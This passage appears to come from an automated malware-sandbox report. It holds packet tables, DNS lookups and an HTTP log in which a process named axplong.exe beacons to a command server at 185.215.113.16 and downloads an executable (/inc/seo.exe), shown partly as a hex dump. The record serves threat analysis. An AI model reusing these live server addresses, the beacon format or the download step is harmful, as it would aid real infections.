Aug 19, 2024 06:06:50.276947021 CEST	49945	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:50.276949883 CEST	49944	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:50.282217026 CEST	80	49945	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:50.531651020 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:50.531706095 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:50.532191992 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:50.532191992 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:50.532242060 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:50.896869898 CEST	443	49943	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:50.896945953 CEST	443	49943	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:50.897228956 CEST	49943	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:50.900500059 CEST	49943	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:50.900516987 CEST	443	49943	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.034921885 CEST	80	49945	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:51.035449982 CEST	49945	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.150578022 CEST	49945	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.150928974 CEST	49947	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.155997038 CEST	80	49947	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:51.156128883 CEST	80	49945	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:51.156290054 CEST	49945	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.156294107 CEST	49947	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.156498909 CEST	49947	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.161369085 CEST	80	49947	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:51.190906048 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.190982103 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.191663027 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.191675901 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.193893909 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.193900108 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.193936110 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.193948030 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.590431929 CEST	49948	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.590523958 CEST	443	49948	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.590595961 CEST	49948	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.590918064 CEST	49948	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.590949059 CEST	443	49948	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.881483078 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.881582975 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.881632090 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.881680965 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.881731033 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.881783009 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.882818937 CEST	49946	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:51.882854939 CEST	443	49946	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:51.908448935 CEST	80	49947	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:51.908531904 CEST	49947	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.911601067 CEST	49947	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.912024021 CEST	49949	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.916771889 CEST	80	49947	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:51.916827917 CEST	49947	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.916840076 CEST	80	49949	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:51.916904926 CEST	49949	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.917325974 CEST	49949	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:51.922195911 CEST	80	49949	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:52.258915901 CEST	443	49948	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:52.261132002 CEST	49948	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:52.261132002 CEST	49948	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:52.261167049 CEST	443	49948	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:52.264508009 CEST	49948	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:52.264516115 CEST	443	49948	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:52.698667049 CEST	80	49949	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:52.698915958 CEST	49949	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:52.807008982 CEST	49949	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:52.807337046 CEST	49950	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:52.812510967 CEST	80	49950	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:52.813906908 CEST	80	49949	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:52.814028978 CEST	49949	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:52.814029932 CEST	49950	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:52.814356089 CEST	49950	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:52.819216013 CEST	80	49950	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:52.908078909 CEST	443	49948	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:52.908168077 CEST	443	49948	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:52.908205986 CEST	49948	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:52.908412933 CEST	49948	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:52.909147978 CEST	49948	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:52.909173012 CEST	443	49948	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:53.553002119 CEST	80	49950	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:53.553070068 CEST	49950	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:53.559801102 CEST	49950	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:53.560391903 CEST	49951	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:53.565320969 CEST	80	49950	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:53.565356970 CEST	80	49951	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:53.565372944 CEST	49950	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:53.565417051 CEST	49951	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:53.566097021 CEST	49951	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:53.570950985 CEST	80	49951	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:53.627197027 CEST	49952	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:53.627294064 CEST	443	49952	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:53.627373934 CEST	49952	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:53.628442049 CEST	49952	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:53.628479004 CEST	443	49952	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:54.280863047 CEST	443	49952	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:54.281222105 CEST	49952	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:54.285677910 CEST	49952	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:54.285677910 CEST	49952	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:54.285712957 CEST	443	49952	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:54.285752058 CEST	443	49952	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:54.532792091 CEST	80	49951	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:54.532938004 CEST	49951	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:54.650770903 CEST	49953	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:54.650774002 CEST	49951	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:54.765541077 CEST	80	49951	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:54.765564919 CEST	80	49951	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:54.765624046 CEST	49951	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:54.765624046 CEST	49951	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:54.765822887 CEST	80	49953	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:54.765906096 CEST	49953	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:54.766168118 CEST	49953	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:54.766297102 CEST	80	49951	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:54.766433001 CEST	49951	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:54.771114111 CEST	80	49953	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:54.964760065 CEST	443	49952	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:54.964829922 CEST	443	49952	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:54.964881897 CEST	49952	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:54.965070963 CEST	49952	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:54.965347052 CEST	49952	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:54.965389013 CEST	443	49952	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:54.966829062 CEST	49954	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:54.966926098 CEST	443	49954	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:54.967046022 CEST	49954	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:54.967400074 CEST	49954	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:54.967437029 CEST	443	49954	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:55.537354946 CEST	80	49953	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:55.537416935 CEST	49953	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:55.541695118 CEST	49953	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:55.542155981 CEST	49955	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:55.547337055 CEST	80	49953	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:55.547374010 CEST	80	49955	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:55.547388077 CEST	49953	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:55.547446012 CEST	49955	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:55.547596931 CEST	49955	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:55.553417921 CEST	80	49955	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:55.640252113 CEST	443	49954	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:55.640384912 CEST	49954	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:55.641091108 CEST	49954	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:55.641119003 CEST	443	49954	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:55.643641949 CEST	49954	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:55.643657923 CEST	443	49954	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:56.325592995 CEST	443	49954	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:56.325668097 CEST	443	49954	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:56.325823069 CEST	49954	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:56.326189041 CEST	49954	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:56.326211929 CEST	443	49954	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:56.345824957 CEST	80	49955	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:56.347177982 CEST	49955	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:56.495856047 CEST	49955	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:56.495857954 CEST	49956	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:56.500920057 CEST	80	49956	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:56.501213074 CEST	80	49955	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:56.502696037 CEST	49955	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:56.502697945 CEST	49956	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:56.505676031 CEST	49956	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:56.515794992 CEST	80	49956	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:57.250015020 CEST	80	49956	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:57.250072002 CEST	49956	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:57.282351017 CEST	49956	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:57.282948971 CEST	49957	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:57.287585020 CEST	80	49956	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:57.287638903 CEST	49956	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:57.287785053 CEST	80	49957	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:57.287856102 CEST	49957	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:57.288176060 CEST	49957	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:57.293005943 CEST	80	49957	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:58.066273928 CEST	80	49957	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:58.066458941 CEST	49957	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.183795929 CEST	49957	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.183949947 CEST	49958	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.188873053 CEST	80	49958	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:58.188965082 CEST	49958	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.189224005 CEST	80	49957	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:58.189819098 CEST	49958	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.189897060 CEST	49957	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.194634914 CEST	80	49958	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:58.943365097 CEST	80	49958	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:58.943495989 CEST	49958	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.982870102 CEST	49958	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.984070063 CEST	49959	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.987951994 CEST	80	49958	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:58.988023996 CEST	49958	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.989110947 CEST	80	49959	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:58.989268064 CEST	49959	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.989631891 CEST	49959	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:58.994508982 CEST	80	49959	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:59.776974916 CEST	80	49959	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:59.777092934 CEST	49959	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.037863016 CEST	49959	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.038202047 CEST	49960	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.043282032 CEST	80	49960	185.215.113.16	192.168.2.4
Aug 19, 2024 06:07:00.043407917 CEST	80	49959	185.215.113.16	192.168.2.4
Aug 19, 2024 06:07:00.043452978 CEST	49960	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.043577909 CEST	49959	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.043876886 CEST	49960	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.048604012 CEST	80	49960	185.215.113.16	192.168.2.4
Aug 19, 2024 06:07:00.812819958 CEST	80	49960	185.215.113.16	192.168.2.4
Aug 19, 2024 06:07:00.813024998 CEST	49960	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.816317081 CEST	49960	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.816818953 CEST	49961	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.821433067 CEST	80	49960	185.215.113.16	192.168.2.4
Aug 19, 2024 06:07:00.821502924 CEST	49960	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.821557045 CEST	80	49961	185.215.113.16	192.168.2.4
Aug 19, 2024 06:07:00.821621895 CEST	49961	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.829401970 CEST	49961	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:07:00.834172964 CEST	80	49961	185.215.113.16	192.168.2.4
Aug 19, 2024 06:07:01.592987061 CEST	80	49961	185.215.113.16	192.168.2.4
Aug 19, 2024 06:07:01.593087912 CEST	49961	80	192.168.2.4	185.215.113.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 19, 2024 06:04:08.818557978 CEST	54084	53	192.168.2.4	1.1.1.1
Aug 19, 2024 06:04:08.834577084 CEST	53	54084	1.1.1.1	192.168.2.4
Aug 19, 2024 06:05:52.310235977 CEST	56460	53	192.168.2.4	1.1.1.1
Aug 19, 2024 06:05:52.317028046 CEST	53	56460	1.1.1.1	192.168.2.4
Aug 19, 2024 06:06:56.367058992 CEST	51822	53	192.168.2.4	1.1.1.1
Aug 19, 2024 06:06:56.376122952 CEST	53	51822	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 19, 2024 06:04:08.818557978 CEST	192.168.2.4	1.1.1.1	0xbfd6	Standard query (0)	VBSJYFEwZnGfeqPJmZz.VBSJYFEwZnGfeqPJmZz	A (IP address)	IN (0x0001)	false
Aug 19, 2024 06:05:52.310235977 CEST	192.168.2.4	1.1.1.1	0x41ae	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Aug 19, 2024 06:06:56.367058992 CEST	192.168.2.4	1.1.1.1	0x7674	Standard query (0)	arpdabl.zapto.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 19, 2024 06:04:08.834577084 CEST	1.1.1.1	192.168.2.4	0xbfd6	Name error (3)	VBSJYFEwZnGfeqPJmZz.VBSJYFEwZnGfeqPJmZz	none	none	A (IP address)	IN (0x0001)	false
Aug 19, 2024 06:05:52.317028046 CEST	1.1.1.1	192.168.2.4	0x41ae	No error (0)	steamcommunity.com		23.210.122.61	A (IP address)	IN (0x0001)	false
Aug 19, 2024 06:06:56.376122952 CEST	1.1.1.1	192.168.2.4	0x7674	No error (0)	arpdabl.zapto.org		0.0.0.0	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

195.201.118.191

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:02.267920971 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:03.013286114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:03.016980886 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:03.269598961 CEST	277	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 37 0d 0a 20 3c 63 3e 31 30 30 30 31 35 36 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 33 30 66 39 66 32 62 34 62 36 35 32 36 65 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 57 <c>1000156001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730f9f2b4b6526e#<d>0
Aug 19, 2024 06:04:03.271759987 CEST	51	OUT	GET /inc/seo.exe HTTP/1.1 Host: 185.215.113.16
Aug 19, 2024 06:04:03.522007942 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:03 GMT Content-Type: application/octet-stream Content-Length: 972074 Last-Modified: Sun, 18 Aug 2024 14:39:24 GMT Connection: keep-alive ETag: "66c2079c-ed52a" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3c ef 79 64 78 8e 17 37 78 8e 17 37 78 8e 17 37 5f 48 7a 37 7b 8e 17 37 5f 48 6c 37 69 8e 17 37 78 8e 16 37 d0 8e 17 37 71 f6 94 37 73 8e 17 37 71 f6 83 37 79 8e 17 37 71 f6 86 37 79 8e 17 37 52 69 63 68 78 8e 17 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 da 6c c0 4b 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 68 00 00 00 40 07 00 00 42 00 00 15 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 80 10 00 00 04 00 00 00 00 00 00 02 00 00 84 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$<ydx7x7x7_Hz7{7_Hl7i7x77q7s7q7y7q7y7Richx7PELlKh@B4@ ..textgh `.rdatal@@.data@.ndata.rsrc @@
Aug 19, 2024 06:04:03.522030115 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d Data Ascii: U\}t+}FEuHGHPuuu\|@KSV5GWEPu@eEEPu@}eD@FRVVU+MMEFQNUMMVTU
Aug 19, 2024 06:04:03.522047043 CEST	328	IN	Data Raw: 02 00 00 53 56 57 8d 45 fc 50 a1 90 b3 47 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 80 40 00 3b c3 75 69 8b 35 00 80 40 00 bf 05 01 00 00 eb 19 39 5d 10 75 4b 53 8d 85 f0 fd ff ff 50 ff 75 fc e8 b2 ff ff ff 85 c0 75 12 57 8d 85 f0 fd ff Data Ascii: SVWEPGP3Suu@;ui5@9]uKSPuuWPSutu@jF;t$S5Guuu@3@_^[9Guuu@uU@@VWt=dGEPGEPjj"^PW@
Aug 19, 2024 06:04:03.522140026 CEST	1236	IN	Data Raw: 40 00 8b 4d d8 83 c1 fe 83 f9 44 0f 87 62 16 00 00 ff 24 8d 6c 2c 40 00 6a 00 50 e8 6e 34 00 00 b8 ff ff ff 7f e9 54 16 00 00 ff 05 74 32 47 00 83 7d f8 00 74 ea 6a 00 ff 15 2c 82 40 00 eb e0 50 e8 51 fd ff ff 48 6a 00 50 e8 67 fd ff ff e9 2a 16 Data Ascii: @MDb$l,@jPn4Tt2G}tj,@PQHjPg*jP2433@P@u0@}u#`G G3AM`G G`GU`G3#MD4`Gy
Aug 19, 2024 06:04:03.522169113 CEST	1236	IN	Data Raw: 0f 85 99 11 00 00 8b 45 f0 e9 9c 11 00 00 6a f0 5e eb b1 33 f6 46 e8 88 f9 ff ff 50 e8 f4 3f 00 00 e9 72 11 00 00 6a 02 59 e8 5f f9 ff ff 6a 03 59 89 45 08 e8 54 f9 ff ff 33 f6 46 8b d8 e8 60 f9 ff ff 8b f0 33 c0 66 89 07 39 45 e4 74 09 39 45 08 Data Ascii: Ej^3FP?rjY_jYET3F`3f9Et9EGV?}5;~^PW?u}W?yeu 3fwj ^j1^}PWu@E@3Fh
Aug 19, 2024 06:04:03.522183895 CEST	328	IN	Data Raw: 0c 00 00 ff 15 70 82 40 00 e9 bd 0c 00 00 33 f6 e8 ba f4 ff ff 6a 31 5e 8b f8 e8 b0 f4 ff ff 6a 22 5e 89 45 08 e8 a5 f4 ff ff 6a 15 5e 8b d8 e8 9b f4 ff ff 6a ec e8 6d f4 ff ff 0f b7 03 6a 00 90 f7 d8 1b c0 23 c3 68 b0 40 4d 00 50 0f b7 07 ff 75 Data Ascii: p@3j1^j"^Ej^jmj#h@MPu#Pu@!_#3WVjd*V6E}tO5$@jdPj;jdu;tEPu(@}\|uS9}tEu@j^
Aug 19, 2024 06:04:03.522334099 CEST	1236	IN	Data Raw: 85 f6 0f 84 7b 0b 00 00 56 6a 40 ff 15 20 81 40 00 89 45 f4 85 c0 0f 84 67 0b 00 00 50 56 6a 00 ff 75 d4 e8 13 56 00 00 85 c0 74 35 8d 45 cc 50 8d 45 08 50 68 c8 82 40 00 ff 75 f4 e8 f4 55 00 00 85 c0 74 1c 8b 45 08 ff 70 08 57 e8 d9 38 00 00 8b Data Ascii: {Vj@ @EgPVjuVt5EPEPh@uUtEpW8EpS8eu,@=GEj^3F3E9utW0@;ujVW4@;tyuS:;t=u9utut1E(h@h@
Aug 19, 2024 06:04:03.522350073 CEST	1236	IN	Data Raw: 80 40 00 85 c0 75 03 21 45 fc ff 75 08 ff 15 08 80 40 00 e9 97 06 00 00 68 19 00 02 00 e8 82 ef ff ff 6a 33 5e 8b d8 e8 87 ee ff ff 33 c9 66 89 0f 85 db 0f 84 3f f1 ff ff 8d 4d f4 51 57 8d 4d 08 51 6a 00 50 53 c7 45 f4 08 40 00 00 ff 15 1c 80 40 Data Ascii: @u!Eu@hj3^3f?MQWMQjPSE@@3Au7}t9Mt}u&EME3fO739EWE33fMSnhjY33f; M9UtQWPV@RRRRMQWPV @
